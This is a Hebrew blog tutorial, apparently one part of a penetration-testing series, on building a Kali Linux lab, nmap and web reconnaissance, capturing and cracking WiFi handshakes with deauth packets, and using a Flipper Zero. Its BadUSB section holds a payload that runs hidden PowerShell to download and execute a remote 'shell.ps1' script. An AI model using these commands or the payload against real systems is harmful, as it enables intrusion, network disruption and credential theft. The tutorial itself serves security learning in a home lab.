תפריט
אודות שירותים מסע עבדו איתי
Linux terminal with code
אבטחה מרץ 7, 2026 • 25 דקות קריאה

Kali Linux Fundamentals: Build Your Hacking Laboratory

Set up Kali Linux, master nmap reconnaissance, capture WiFi handshakes with aircrack-ng, and connect your Flipper Zero to professional penetration testing workflows.

שתפו:
Lee Foropoulos

Lee Foropoulos

25 דקות קריאה

מסלול ההאקר: סדרה בת 5 חלקים

חלק 1: מבואחלק 2: שליטה ב-Flipperחלק 3: יסודות Kaliחלק 4: ניצולחלק 5: הביקורת המלאה

בחלקים 1 ו-2, שכפלתם כרטיסים, ניתחתם תדרי רדיו והבנתם למה רוב ה"אבטחה" היא תיאטרון. ראיתם פגיעויות מבחוץ. עכשיו אתם נכנסים פנימה ורואים אותן מנקודת המבט של התוקף.

Kali Linux היא הפצת בדיקות החדירה הסטנדרטית בתעשייה. היא מגיעה עם יותר מ-600 כלי אבטחה מותקנים מראש. זה יכול להרגיש מכריע. רוב המדריכים זורקים אתכם למים העמוקים עם פקודות שאתם לא מבינים ובלי הקשר למה הן חשובות.

אנחנו עושים את זה אחרת. עד סוף המאמר הזה, יהיה לכם מעבדה עובדת, תבינו סיור רשת ברמה בסיסית, ותלכדו את לחיצת היד ה-WiFi הראשונה שלכם. כל שלב בנוי על הקודם.

רוב המדריכים זורקים אתכם למים העמוקים עם פקודות שאתם לא מבינים ובלי הקשר למה הן חשובות. כל שלב כאן בנוי על הקודם.

חלק 1: בניית המעבדה שלכם

בודקי חדירה מקצועיים לא מריצים Kali על המחשב הראשי שלהם. הם משתמשים בסביבות מבודדות שאפשר לאפס, לצלם snapshots ולהרוס בלי להשפיע על המערכת הראשית. תעשו אותו דבר.

אפשרות א: מכונה וירטואלית (מומלץ ללמידה)

מכונה וירטואלית נותנת לכם את סביבת הלמידה הבטוחה ביותר. אתם יכולים לצלם snapshots של ההתקדמות, לעשות טעויות ולחזור אחורה מיד.

מה תצטרכו

  • מחשב מארח: 16GB+ RAM, 50GB+ מקום פנוי בדיסק, מעבד מודרני עם תמיכה ב-virtualization
  • תוכנת וירטואליזציה: VirtualBox (חינם) או VMware Workstation Player (חינם לשימוש אישי)
  • Kali Linux: VM רשמי מוכן מראש מ-kali.org

פרויקט: הגדרת Kali VM

זמן: 30-45 דקות

שלבים:

  1. הורידו את תמונת ה-Kali VM עבור ה-hypervisor שלכם (VirtualBox או VMware)
  2. חלצו את הארכיון שהורדתם (7-Zip מומלץ ל-Windows)
  3. ייבאו את ה-VM ל-hypervisor שלכם
  4. הגדירו משאבים: מינימום 4GB RAM (מומלץ 8GB), 2+ ליבות מעבד
  5. הפעילו את מתאם הרשת במצב "Bridged" לגישה מלאה לרשת
  6. אתחלו את ה-VM והתחברו עם פרטי ברירת המחדל: kali / kali
  7. פתחו טרמינל והריצו: sudo apt update && sudo apt full-upgrade -y
  8. צרו snapshot בשם "Fresh Install" לשחזור קל

אימות הצלחה: אתם יכולים לפתוח טרמינל, להריץ whoami ולראות kali.

אפשרות ב: חומרה ייעודית (לתרגול רציני)

ברגע שאתם מרגישים נוח עם Kali, חומרה ייעודית מסירה את תקורת ה-VM ומאפשרת גישה מלאה לחומרה, מה שחיוני לבדיקות אלחוטיות.

המלצות חומרה

אפשרות חסכוניתThinkPad X230/T430 משומש ($100-150), WiFi של Intel מוחלף ב-Atheros AR9285
אפשרות מודרניתFramework Laptop עם מודול WiFi תואם Linux
חיישן ייעודיRaspberry Pi 5 4GB עם מתאם Alfa AWUS036ACH חיצוני

לעת עתה, VM מושלם. חומרה ייעודית הופכת חשובה כשאתם צריכים monitor mode לבדיקות אלחוטיות (מכוסה בהמשך המאמר).

אפשרות ג: Live USB (אפס שמירה)

Live USB מריץ Kali ישירות בלי התקנה. הכל נעלם כשמכבים. שימושי לבדיקות על חומרה שונה, אבל תאבדו את העבודה בכל הפעלה אלא אם תיצרו מחיצה persistent.

bash# Create bootable USB on Linux/Mac
sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
# Replace sdX with your USB device (check with 'lsblk')
# On Windows: Use Rufus or balenaEtcher

dd משמיד נתונים

הפקודה dd כותבת ישירות לדיסק בלי אישור. בדקו שלוש פעמים את שם ההתקן. כתיבה להתקן הלא נכון תמחק את כל הכונן לחלוטין.

Kali Linux terminal with security tools running
סביבת Kali Linux מוגדרת כראוי היא הבסיס לכל בדיקת חדירה מקצועית.

חלק 2: החשיבה של הטרמינל

לפני שנוגעים בכלי אבטחה, צריך שתרגישו בנוח בטרמינל. זה לא אופציונלי. ה-GUI קיים ב-Kali, אבל העבודה האמיתית קורית בשורת הפקודה.

ניווט בסיסי

bash# Know where you are
pwd                    # Print working directory

# Move around
cd /home/kali          # Go to home directory
cd ..                  # Go up one level
cd -                   # Go to previous directory

# See what's here
ls                     # List files
ls -la                 # List all files with details
ls -lah                # Human-readable sizes

# Read files
cat filename           # Display entire file
less filename          # Scrollable view (q to quit)
head -n 20 filename    # First 20 lines
tail -f filename       # Follow file in real-time (logs)

הסלמת הרשאות

כלי אבטחה רבים דורשים גישת root. ב-Kali, sudo נותן לכם הרשאות root זמניות.

bashsudo command           # Run single command as root
sudo -i                # Start root shell (be careful)
whoami                 # Check current user
id                     # Show user and group IDs

Root באחריות

הרצה כ-root משמעה אפס רשתות ביטחון. שגיאת הקלדה כמו rm -rf / תשמיד הכל. Kali מודרני מונע את הפקודה הספציפית הזו, אבל העיקרון עומד: תבינו מה אתם מריצים לפני שאתם מריצים את זה.

ניהול תהליכים

bashps aux                 # All running processes
top                    # Real-time process viewer
htop                   # Better process viewer (install if needed)

# Control processes
ctrl+c                 # Stop current process
ctrl+z                 # Suspend process
bg                     # Resume in background
fg                     # Bring to foreground

# Kill processes
kill PID               # Graceful termination
kill -9 PID            # Force kill (last resort)

פקודות רשת

baship a                   # Show network interfaces
ip route               # Show routing table
ping -c 4 8.8.8.8     # Test connectivity
curl ifconfig.me       # Your public IP

# DNS lookups
nslookup google.com
dig google.com

פרויקט: התמצאות בטרמינל

זמן: 15 דקות

משימות:

  1. מצאו את כתובת ה-IP שלכם ברשת המקומית באמצעות ip a
  2. זהו את ברירת המחדל של ה-gateway באמצעות ip route
  3. עשו ping ל-gateway שלכם כדי לאשר קישוריות
  4. הציגו את כל הקבצים ב-/etc ממוינים לפי זמן שינוי: ls -lt /etc | head
  5. קראו את 50 השורות הראשונות של /etc/passwd: head -n 50 /etc/passwd

מטרה: אתם צריכים להיות מסוגלים לנווט, לבדוק סטטוס רשת ולקרוא קבצים בלי לחשוב.

חלק 3: סיור רשת עם Nmap

Nmap (Network Mapper) הוא הכלי החשוב ביותר שתלמדו. הוא מגלה hosts, מזהה שירותים, מאתר מערכות הפעלה וממפה טופולוגיית רשת. כל השאר בנוי על הפלט של nmap.

הסריקה הראשונה שלכם

בואו נסרוק את הרשת שלכם. קודם, זהו את טווח הרשת:

bash# Find your local IP and subnet
ip a | grep inet
# Look for something like: inet 192.168.1.100/24
# The /24 means your network is 192.168.1.0-255
bash# Basic discovery scan (your network only)
sudo nmap -sn 192.168.1.0/24

# What this does:
# -sn = ping scan (no port scanning, just host discovery)
# /24 = scan all 256 addresses in this subnet

תראו פלט כזה:

textNmap scan report for 192.168.1.1
Host is up (0.0025s latency).
MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)

Nmap scan report for 192.168.1.50
Host is up (0.0042s latency).
MAC Address: 11:22:33:44:55:66 (Another Manufacturer)

הסריקה הראשונה הזו אומרת לכם: "ההתקנים האלה קיימים ברשת שלי." עכשיו בואו נשאל שאלות עמוקות יותר.

זיהוי שירותים

ברגע שאתם יודעים אילו hosts קיימים, אתם רוצים לדעת אילו שירותים הם מריצים.

bash# Scan a single target for open ports and services
sudo nmap -sV 192.168.1.1
# -sV = Version detection (probe open ports for service info)

פלט נפוץ:

textPORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.4p1
80/tcp   open  http     nginx 1.18.0
443/tcp  open  ssl/http nginx 1.18.0

זיהוי מערכת הפעלה

bash# Detect OS (requires root)
sudo nmap -O 192.168.1.1

# Combined scan: OS detection + service versions + default scripts
sudo nmap -A 192.168.1.1

הבנת מצבי פורטים

Nmap מדווח על פורטים במספר מצבים:

  • open - אפליקציה מקבלת חיבורים באופן פעיל. זה מה שתוקפים מחפשים.
  • closed - הפורט נגיש אבל אין אפליקציה שמאזינה. ה-host פעיל אבל שם אין כלום.
  • filtered - חומת אש או פילטר חוסם את הבדיקה. אי אפשר לקבוע אם פתוח או סגור.
  • unfiltered - הפורט נגיש אבל nmap לא יכול לקבוע אם הוא פתוח או סגור.

סוגי סריקה והתגנבות

bash# TCP Connect scan (default, noisy but reliable)
sudo nmap -sT target

# SYN scan (stealthier, default with root)
sudo nmap -sS target

# UDP scan (slow but important - many services use UDP)
sudo nmap -sU target

# Scan all 65535 ports (thorough but slow)
sudo nmap -p- target

# Scan specific ports
sudo nmap -p 22,80,443,8080 target

# Top 1000 common ports (default behavior)
sudo nmap target

Nmap Scripting Engine (NSE)

ה-NSE מרחיב את nmap עם סקריפטים מתמחים לזיהוי פגיעויות, מנייה של שירותים ועוד.

bash# Run default safe scripts
sudo nmap -sC target

# Check for vulnerabilities
sudo nmap --script vuln target

# SMB enumeration (Windows shares)
sudo nmap --script smb-enum-shares target

# HTTP enumeration
sudo nmap --script http-enum target

# List available scripts
ls /usr/share/nmap/scripts/ | head -20

פרויקט: מפו את הרשת שלכם

זמן: 30 דקות

דרישות מקדימות: הכירו את טווח הרשת שלכם מ-ip a

  1. גלו את כל ה-hosts: sudo nmap -sn YOUR_NETWORK/24
  2. רשמו את ה-hosts שהתגלו ואת כתובות ה-MAC שלהם
  3. בחרו את הראוטר שלכם (בדרך כלל .1) והריצו: sudo nmap -sV -sC YOUR_ROUTER
  4. זהו את כל הפורטים הפתוחים והשירותים בראוטר שלכם
  5. הריצו sudo nmap -A YOUR_COMPUTER כדי לראות מה המחשב שלכם חושף

תיעוד: צרו קובץ טקסט שמפרט כל התקן, כתובת IP שלו, MAC והשירותים. זהו מפת הרשת שלכם.

סרקו רק רשתות שבבעלותכם

סריקת רשתות ללא הרשאה היא לא חוקית ברוב תחומי השיפוט. אפילו סריקת nmap פשוטה יכולה להיחשב כגישה לא מורשית. הישארו ברשת שלכם, בציוד שלכם וברשתות שבהן יש לכם אישור כתוב מפורש.

חלק 4: סיור אינטרנט

סריקת ה-nmap שלכם כנראה מצאה שירותי HTTP (פורטים 80, 443, 8080). בואו נבין מה רץ שם.

Whatweb: זיהוי שירות מהיר

bash# Identify web technologies
whatweb http://192.168.1.1

דוגמת פלט:

texthttp://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
HTTPServer[nginx/1.18.0], IP[192.168.1.1],
Title[Router Admin], nginx[1.18.0]

Nikto: סורק פגיעויות אינטרנט

bash# Scan for common web vulnerabilities
nikto -h http://192.168.1.1

# This checks for:
# - Outdated server software
# - Dangerous files/CGIs
# - Misconfigurations
# - Default credentials

מנייה של תיקיות: מה מוסתר?

שרתי אינטרנט לעתים קרובות מכילים תיקיות שלא מקושרות מהעמוד הראשי: פאנלי ניהול, קבצי הגדרות, קבצי גיבוי.

bash# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txt

ממצאים נפוצים:

text/admin   (Status: 301)
/backup  (Status: 403)
/config  (Status: 200)
/login   (Status: 200)

מיקום Wordlists

Kali כולל wordlists מקיפות ב-/usr/share/wordlists/. התיקיות הנפוצות ביותר: dirb/, dirbuster/, rockyou.txt (סיסמאות), ו-seclists/ (אוסף מקיף).

פרויקט: בדקו את ממשק האינטרנט של הראוטר

זמן: 20 דקות

  1. הריצו whatweb http://YOUR_ROUTER_IP כדי לזהות את השרת
  2. הריצו nikto -h http://YOUR_ROUTER_IP כדי לבדוק פגיעויות
  3. הריצו gobuster dir -u http://YOUR_ROUTER_IP -w /usr/share/wordlists/dirb/small.txt
  4. בקרו בתיקיות שהתגלו בדפדפן
  5. רשמו פאנלי ניהול, מספרי גרסאות או ממצאים מעניינים

ממצא נפוץ: עמודי ניהול ראוטר חשופים עם credentials ברירת מחדל.

Server room with network infrastructure
סיור רשת חושף את הטופולוגיה המלאה של סביבת היעד, מראוטרים ועד שירותים מוסתרים.

חלק 5: סיור אלחוטי

כאן הדברים נהיים מעניינים. רשתות WiFi משדרות כל הזמן, ועם הכלים הנכונים, אתם יכולים ללכוד לחיצות יד אימות: ההחלפה המוצפנת שקורית כשהתקן מתחבר.

דרישות חומרה

ה-WiFi המובנה שלכם כנראה לא יעבוד לזה. אתם צריכים מתאם שתומך ב-monitor mode וב-packet injection. מומלץ: Alfa AWUS036ACH ($50) או Alfa AWUS036ACM ($45). אלה עובדים מהקופסה עם Kali.

הבנת Monitor Mode

מצב WiFi רגיל ("managed mode") מקבל רק חבילות שמיועדות להתקן שלכם. Monitor mode לוכד את כל החבילות בטווח, התעבורה של כל התקן בערוץ.

bash# Check your wireless interfaces
iwconfig
# Look for your adapter (often wlan0 or wlan1)

# Kill interfering processes
sudo airmon-ng check kill

# Enable monitor mode
sudo airmon-ng start wlan0
# Your interface is now wlan0mon

סריקה לרשתות

bash# Start capturing wireless traffic
sudo airodump-ng wlan0mon

# You'll see:
# BSSID  = Router MAC address
# PWR    = Signal strength (higher = closer)
# CH     = Channel
# ENC    = Encryption (WPA2, WPA3, OPN)
# ESSID  = Network name

# Press Ctrl+C to stop

מה שאתם רואים הוא כל רשת WiFi בטווח, הגדרות האבטחה שלהן, ולעתים קרובות ההתקנים המחוברים אליהן. זה מה ש-war driver רואה כשהוא סורק שכונות.

לכידת Handshake

כשהתקן מתחבר לרשת WPA2, יש four-way handshake. אם תלכדו את ה-handshake הזה, תוכלו לנסות לפצח את הסיסמה offline.

bash# Focus on your target network (your own network!)
sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
# -c CHANNEL = Target's channel from previous scan
# --bssid = Target router's MAC address
# -w capture = Save to files starting with "capture"

# Now wait for a device to connect...

# Or force a reconnection (on YOUR network only):
# In a new terminal:
sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
# This sends 5 deauth packets, disconnecting clients
# They automatically reconnect, generating a handshake

כשתלכדו handshake, airodump-ng מציג [ WPA handshake: XX:XX:XX:XX:XX:XX ] בפינה הימנית העליונה.

התקפות Deauth הן לא חוקיות

שליחת חבילות deauthentication לרשתות שאינן בבעלותכם היא עבירה פדרלית על פי ה-Computer Fraud and Abuse Act (בארה"ב) וחוקים דומים במקומות אחרים. בדקו רק ברשת שלכם. המטרה היא להבין את הפגיעות, לא לתקוף אחרים.

פיצוח ה-Handshake

עם handshake שנלכד, אתם יכולים לנסות לפצח את הסיסמה offline באמצעות wordlist:

bash# Crack using a wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# If the password is in the wordlist, you'll see:
# KEY FOUND! [ password123 ]

# For stronger passwords, use hashcat (GPU-accelerated)
# First, convert capture format:
cap2hccapx capture-01.cap capture.hccapx

# Then crack with hashcat:
hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txt
14M+
סיסמאות אמיתיות מפריצות נתונים אמיתיות כלולות ב-rockyou.txt, ה-wordlist ברירת המחדל שמשמשת לפיצוח WiFi handshakes שנלכדו.

בדיקת מציאות חוזק סיסמאות

rockyou.txt מכיל 14+ מיליון סיסמאות מפריצות נתונים אמיתיות. אם סיסמת ה-WiFi שלכם היא "password123" או "summer2024" או שם הכלב שלכם, אפשר לפצח אותה בשניות. סיסמה אקראית של 12+ תווים תיקח מיליוני שנים ל-brute-force.

פרויקט: בדקו את אבטחת ה-WiFi שלכם

זמן: 45 דקות

דרישות מקדימות: מתאם WiFi חיצוני עם תמיכה ב-monitor mode

  1. הפעילו monitor mode: sudo airmon-ng start wlan0
  2. סרקו רשתות: sudo airodump-ng wlan0mon
  3. רשמו את הערוץ וה-BSSID של הרשת שלכם
  4. לכדו בערוץ שלכם: sudo airodump-ng -c CHANNEL --bssid YOUR_BSSID -w mywifi wlan0mon
  5. חברו מחדש התקן ל-WiFi שלכם (או השתמשו ב-deauth ברשת שלכם בלבד)
  6. אשרו לכידת handshake
  7. בדקו מול rockyou.txt: aircrack-ng -w /usr/share/wordlists/rockyou.txt mywifi-01.cap

תוצאה: אם הסיסמה שלכם נמצאה, שנו אותה מיד למשהו אקראי וארוך (20+ תווים).

חלק 6: חיבור ה-Flipper Zero שלכם

זוכרים את כל הלכידות מחלק 2? בואו נשלב אותן בזרימת העבודה שלכם עם Kali.

העברת קבצים

bash# Connect Flipper via USB
# It appears as a mass storage device

# Mount if not auto-mounted
sudo mount /dev/sda1 /mnt/flipper

# Your captures are in:
/mnt/flipper/subghz/       # Sub-GHz captures
/mnt/flipper/nfc/          # NFC dumps
/mnt/flipper/infrared/     # IR captures
/mnt/flipper/lfrfid/       # 125kHz RFID
/mnt/flipper/badusb/       # BadUSB scripts

ניתוח NFC Dumps

bash# Install libnfc tools
sudo apt install libnfc-bin mfoc mfcuk

# Flipper saves NFC as .nfc text format
# Convert to binary for analysis:
python3 flipper_nfc_to_mfd.py card.nfc card.mfd

# Analyze MIFARE Classic dump
hexdump -C card.mfd | less

ניתוח Sub-GHz

bash# Flipper's .sub files are text-based
cat garage_door.sub

# Contains:
# - Frequency (315MHz, 433MHz, etc.)
# - Protocol or RAW data
# - Timing information

# For deeper RF analysis, use:
# - Universal Radio Hacker (URH)
# - GNU Radio
# - rtl_433 (with SDR hardware)

פיתוח BadUSB

צרו payloads של BadUSB ב-Kali, בדקו אותם ב-Flipper:

bash# Flipper uses DuckyScript-compatible syntax
# Create payload on Kali:
cat > kali_connect.txt << 'EOF'
DELAY 1000
GUI r
DELAY 500
STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
ENTER
EOF

# Host the payload from Kali:
python3 -m http.server 8000

# Copy to Flipper's badusb folder
cp kali_connect.txt /mnt/flipper/badusb/

Payloads של BadUSB הם עוצמתיים

הסקריפטים האלה מתבצעים אוטומטית כשמחברים אותם. payload זדוני יכול להתקין backdoors, לגנוב credentials או להשמיד נתונים בשניות. השתמשו רק במכונות שלכם לבדיקות. לעולם אל תשאירו את ה-Flipper שלכם במקום שמישהו אחר עלול לחבר אותו.

חלק 7: תיעוד וזרימת עבודה

בודקי חדירה מקצועיים לא רק מריצים כלים. הם מתעדים הכל. תיעוד טוב מפריד בין חובבנים למקצוענים.

רישום הערות עם CherryTree

bash# Install CherryTree (hierarchical note-taking)
sudo apt install cherrytree

# Organize notes by:
# - Target/network
# - Reconnaissance
# - Enumeration
# - Vulnerabilities
# - Exploitation attempts
# - Post-exploitation

שמירת פלט Nmap

bash# Save in all formats
sudo nmap -sV -sC -oA scan_results target

# Creates:
# scan_results.nmap (human-readable)
# scan_results.xml  (parseable)
# scan_results.gnmap (greppable)

רישום הפעלה

bash# Log entire terminal session
script session_$(date +%Y%m%d_%H%M%S).log

# Now every command and output is recorded
# Type 'exit' to stop logging

מסלול ההאקר

סדרה בת 5 חלקים שלוקחת אתכם מסקרנים למסוגלים.

חלק 1: מבוא חלק 2: שליטה ב-Flipper חלק 3: יסודות Kali ✓ חלק 4: ניצול חלק 5: ביקורת מלאה

רשימת בדיקה לחלק 3

☐ הגדרת מעבדה: Kali VM רץ, מעודכן, snapshot נשמר

☐ טרמינל: נוח עם ניווט, הרשאות, שליטה בתהליכים

☐ Nmap: רשת ממופה, שירותים מזוהים, ראוטר נסרק

☐ סיור אינטרנט: ממשק אינטרנט של ראוטר נותח עם whatweb/nikto

☐ אלחוטי: Monitor mode מופעל, רשתות נסרקו

☐ Handshake: WiFi handshake של עצמכם נלכד ונבדק

☐ Flipper: קבצים הועברו, זרימת עבודה מובנת

☐ תיעוד: הערות מאורגנות, סריקות נשמרו

תוכנית פעולה ליסודות Kali 0/6

מה הלאה

בניתם את המעבדה שלכם ולמדתם את שלב הסיור. אתם יכולים לגלות hosts, לזהות שירותים וללכוד handshakes אלחוטיים. אתם מבינים מה תוקפים רואים כשהם מסתכלים על רשת.

בחלק 4, עוברים מסיור לניצול. תלמדו:

  • Metasploit Framework, האולר השוויצרי של הניצול
  • זרימות עבודה נפוצות לניצול פגיעויות
  • טכניקות post-exploitation: מה קורה אחרי הגישה הראשונית
  • הסלמת הרשאות: מעבר ממשתמש רגיל למנהל
  • Pivoting: שימוש במערכת שנפרצה כדי לתקוף אחרות

הסיור אומר לכם איפה הדלתות. הניצול מלמד אתכם איך לעבור דרכן.

מיפיתם את השטח. עכשיו אתם לומדים לנווט בו. חלק 4 לוקח אתכם מצופה למפעיל.

נתראה בחלק 4.

How was this article?

שתפו

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Al tachmits af post

Qabel hodaot keshemashmim maamarim chadashim. Lo dorshim email.

Tire banner baatar keshemashmim maamar chadash, vetodaa medafdefan im teashru.

Hodaot defdefan bilvad. Beli spam, beli email.